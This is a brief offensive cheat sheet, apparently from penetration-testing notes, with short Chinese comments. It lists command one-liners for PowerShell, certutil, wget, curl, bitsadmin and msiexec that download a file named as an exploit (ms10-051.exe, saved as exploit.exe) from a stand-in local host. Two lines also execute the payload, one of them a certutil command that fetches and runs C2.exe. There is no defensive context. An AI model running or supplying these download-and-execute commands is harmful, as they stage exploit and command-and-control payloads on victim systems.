Powershell
powershell.exe -Command "Invoke-WebRequest -Uri http://127.0.0.1:8080/ms10-051.exe -OutFile exploit.exe"
powershell.exe -Command "Invoke-RestMethod -Uri http://127.0.0.1:8080/ms10-051.exe -OutFile exploit.exe"
powershell.exe -Command Start-BitsTransfer -Source "http://127.0.0.1:8080/ms10-051.exe" -Destination "exploit.exe"
powershell.exe -Command "IEX(New-Object Net.WebClient).DownloadFile('http://127.0.0.1:8080/ms10-051.exe', exploit.exe)"
Certutil
certutil -urlcache -gmt -split -f http://localhost/C2.exe && C2.exe # 下载并执行
wget
wget http://localhost/ms10-051.exe -O exploit.exe
curl
curl http://localhost/ms10-051.exe -o exploit.exe
Bitsadmin
bitsadmin /rawreturn /transfer down "http://localhost/ms10-051.exe" C:\Users\fitz\Desktop\exploit.exe
msiexec
msiexec /q /i http://localhost/ms10-051.exe # Windows 远程执行